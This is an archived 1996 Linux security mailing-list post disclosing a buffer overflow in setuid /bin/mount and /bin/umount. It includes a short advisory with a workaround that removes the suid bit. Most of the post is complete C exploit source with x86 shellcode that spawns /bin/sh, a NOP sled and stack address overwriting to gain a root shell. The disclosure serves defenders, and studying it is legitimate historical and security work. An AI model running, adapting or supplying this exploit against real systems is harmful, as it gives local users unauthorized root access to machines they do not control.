[1000] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

[linux-security] Vulnerability in ALL linux distributions

daemon@ATHENA.MIT.EDU (bloodmask)
Tue Aug 13 11:55:38 1996

Date: Tue, 13 Aug 1996 06:49:55 +0200
From: bloodmask <bloodmask@mymail.com>
To: linux-security@tarsier.cv.nrao.edu
CC: linux-alert@tarsier.cv.nrao.edu

This is a multi-part message in MIME format.

--------------3E2982D84A560D2D9A831FA
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Greetings folks,
Sorry we haven't released this thing sooner, due to testing we've
conducted to determine vulnerability on other systems besides Linux,
I've attached the officail release, Patch this up quick, and if I were
you, I wouldn't trust those old binaries to be secure anymore, this
thing has been with Linux since it's beggining, at it's high time this
"feature" is removed.

--------------3E2982D84A560D2D9A831FA
Content-Type: text/plain; charset=us-ascii; name="cvnmount.exploit"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="cvnmount.exploit"

Covin Security Releases:
(mount bufferoverflow exploit v1.0)

Tested operated systems: All current distributions of Linux

Affect: Local users on systems affected can gain overflow mounts syntax 
buffer and execute a shell by overwriting the stack.

Affected binaries:
(/bin/mount and /bin/umount)

Workaround:
On all current distributions of Linux remove suid bit of /bin/mount and 
/bin/umount. 
[chmod -s /bin/mount;chmod -s /bin/umount]

Remarks:
For gods sake, how many more times are we gonna see this kind of problem? 
It's been with Linux since it's very beggining, and it's so easy to 
exploit. Similiar buffer overflow vulnerabilities have been found in 
Linux distributions many times before, splitvt, dip, just to name a few 
examples. 


Any remarks, notes or other forms of feedback may be redirected to: 
bloodmask@mymail.com

[Mod: This exploit has already been posted to Bugtraq.  --Jeff.]

<------------------------------[ Cut here ]---------------------------------->

/* Mount Exploit for Linux, Jul 30 1996 

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp() 
{ 
  __asm__("movl %esp, %eax"); 

}

main(int argc, char **argv)
{
  u_char execshell[] = 
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   
   int i;
   int ofs = DEFAULT_OFFSET;
   
   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
   execl(PATH_MOUNT, "mount", buff, NULL);
}

--------------3E2982D84A560D2D9A831FA--

home help back first fref pref prev next nref lref last post